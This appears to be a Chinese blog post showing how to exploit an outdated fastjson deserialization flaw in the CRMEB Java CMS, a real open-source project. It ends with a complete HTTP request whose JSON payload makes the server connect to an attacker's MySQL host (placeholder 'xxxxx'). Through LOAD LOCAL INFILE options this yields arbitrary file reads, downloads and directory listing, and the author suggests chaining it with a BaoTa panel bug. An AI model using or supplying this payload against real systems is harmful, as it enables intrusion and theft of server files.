crmeb java版本CMS fastjson利用

4.5K start 2K fork的项目，之前用了低版本的fastjson，新版本修复了。

https://gitee.com/ZhongBangKeJi/crmeb_java

之前用1.2.56版本fastjson，1.2.68公开的有fastjson commons-io AutoCloseable写任意文件，本地测payload没问题，真实场景利用不了

引用su18: https://github.com/su18/fastjson-commons-io/tree/e6724ac297e1aa7ae44a62a3ad6cc3f537d3c737

注意：由于 fastjson 获取 WriterOutputStream 的构造方法时并不唯一，所以这个 payload 并不是每次都能触发，需要等随机到带有指定参数的构造方法才能触发，测试的小伙伴多测几次就可以写入了。如果你有解决这个问题的办法请联系我。

 

springboot来说也有点鸡肋，在blackhat 2021有人提出了新的姿势：

https://blog.noah.360.net/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/

刚好可以配合mysql的jdbc，让fastjson主动去链接我的mysql，根据已学知识，我们在继续构造payload，再利用"allowUrlInLocalInfile":"true","allowLoadLocalInfile":"true","allowLoadLocalInfileInPath":"/",

可以构成任意文件读取&&任意文件下载，下载jar包，，利用file:// 可以做到列目录，再与宝塔漏洞再进行利用无敌。

show code:

POST /api/public/wechat/gitlab?token=aa HTTP/1.1
Host: 192.168.220.2:8081
Content-Length: 479
Request-Origion: SwaggerBootstrapUi
Accept: */*
X-Requested-With: XMLHttpRequest
Authori-zation: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://192.168.220.2:8081
Referer: http://192.168.220.2:8081/doc.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"@type":"java.lang.AutoCloseable", "@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"xxxxx","portToConnectTo":1234,"databaseToConnectTo":"test","info": {"@type":"java.util.Properties","PORT":"1234",
"allowUrlInLocalInfile":"true",
"allowLoadLocalInfile":"true",
"allowLoadLocalInfileInPath":"/",
"maxAllowedPacket":"655360",
"user":"fileread_file:///.","PORT.1":"1234","HOST.1":"xxxxxxxxx","NUM_HOSTS":"1","HOST":"xxxxx","DBNAME":"test"}